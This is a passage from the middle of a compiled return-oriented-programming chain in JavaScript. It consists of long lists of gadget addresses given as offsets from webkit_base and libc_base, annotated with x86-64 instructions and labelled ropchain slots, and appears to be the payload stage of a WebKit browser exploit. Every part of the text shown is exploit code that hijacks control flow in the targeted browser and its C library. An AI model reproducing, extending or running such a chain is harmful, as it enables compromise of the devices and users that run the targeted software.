webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1753: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1755: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+133368, //L1758 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+133384, //L1759 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+133336, //L1756 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+133352, //L1757 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1756: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L1757: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1758: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1759: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+133464, //L1760 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+133480, //L1761 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1760: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1761: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+133576, //L1763 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+133560, //L1762 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1762: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1763: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+133656, //L1764 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1764: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1766: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+133776, //L1769 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+133760, //L1767 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1767: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1769: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+133888, //L1770 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+133936, //L1773 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+133904, //L1771 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1770: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1771: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1772: db([12, 0]); // 0xc set_gadget(libc_base+759608,); //pop rax //L1773: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+134040, //L1776 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+134024, //L1774 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1774: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1776: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+134216, //L1779 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+134232, //L1780 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+134184, //L1777 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+134200, //L1778 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1777: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L1778: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1779: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1780: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+134312, //L1781 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+134328, //L1782 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1781: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1782: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+134440, //L1783 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+134472, //L1785 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+134456, //L1784 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1783: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1784: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1785: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+2115150, //setle al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+134648, //L1787 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+134664, //L1788 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+134632, //L1786 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L1786: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1787: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1788: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+134824, //L1793 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+134840, //L1794 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+134776, //L1790 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1790: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1791: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L1792: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L1793: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1794: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+134952, //L1795+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+134944, //L1795 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L1795: db([0, 0]); // 0x0 set_gadgets([ ropchain+134968, //L1795+24 ropchain+136656, //L1789 libc_base+764760, //pop rsi ropchain+135008, //L1796 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1796: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1798: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+135128, //L1801 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+135112, //L1799 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1799: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1801: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+135304, //L1804 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+135320, //L1805 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+135272, //L1802 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+135288, //L1803 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1802: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L1803: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1804: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1805: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+135400, //L1806 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+135416, //L1807 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1806: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1807: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+135576, //L1811 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+135544, //L1809 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+135560, //L1810 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1808: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L1809: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1810: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1811: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+135632, //L1813 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L1813: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+135760, //L1815 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+135776, //L1816 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+135744, //L1814 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1814: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L1815: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1816: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+135856, //L1817 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+135872, //L1818 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1817: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1818: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+135968, //L1820 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+135952, //L1819 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1819: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1820: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+136048, //L1821 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L1821: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1822: db([10, 0]); // 0xa set_gadget(libc_base+144605,); //pop rdi //L1823: db([10, 0]); // 0xa set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+136192, //L1824 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+136224, //L1826 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+136208, //L1825 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1824: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1825: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1826: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+136400, //L1828 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+136416, //L1829 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+136384, //L1827 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L1827: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1828: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1829: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+136560, //L1832 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+136576, //L1833 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+136528, //L1830 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1830: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1831: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L1832: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1833: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+136648, //L1834 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1834: db([0, 0]); // 0x0 //L1789: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+136776, //L1837 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+136792, //L1838 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+136760, //L1836 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L1836: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1837: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1838: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+136936, //L1841 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+136952, //L1842 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+136904, //L1839 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1839: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1840: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L1841: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1842: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+137024, //L1843 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1843: db([0, 0]); // 0x0 //L1736: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+137152, //L1846 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+137168, //L1847 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+137136, //L1845 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L1845: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1846: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1847: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+137280, //L1849 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+137328, //L1852 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+137296, //L1850 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L1849: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1850: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1851: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1852: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+137440, //L1853+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+137432, //L1853 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L1853: db([0, 0]); // 0x0 set_gadgets([ ropchain+137456, //L1853+24 ropchain+139800, //L1848 libc_base+764760, //pop rsi ropchain+137496, //L1854 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1854: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1856: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+137616, //L1859 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+137600, //L1857 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1857: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1859: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+137792, //L1862 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+137808, //L1863 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+137760, //L1860 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+137776, //L1861 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1860: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L1861: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1862: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1863: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+137888, //L1864 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+137904, //L1865 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1864: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1865: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+138064, //L1869 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+138032, //L1867 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+138048, //L1868 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1866: db([56, 0]); // 0x38 set_gadget(webkit_base+3236123,); //pop r9 //L1867: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1868: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1869: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+138168, //L1871 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+138152, //L1870 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1870: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1871: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+138248, //L1872 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1872: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1874: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+138368, //L1877 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+138352, //L1875 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1875: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1877: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+138448, //L1878 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+138464, //L1879 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1878: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1879: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+138608, //L1882 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+138576, //L1880 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+138592, //L1881 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1880: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1881: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1882: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+138696, //L1884 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L1883: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L1884: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+138784, //L1885 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1885: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1887: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+138904, //L1890 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+138888, //L1888 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1888: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1890: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+138992, //L1891 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+139008, //L1893 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L1891: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1893: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+139064, //L1894 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1894: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+139184, //L1897 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1897: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+139240, //L1898 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1898: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+139384, //L1902 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+139368, //L1901 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1900: db([56, 0]); // 0x38 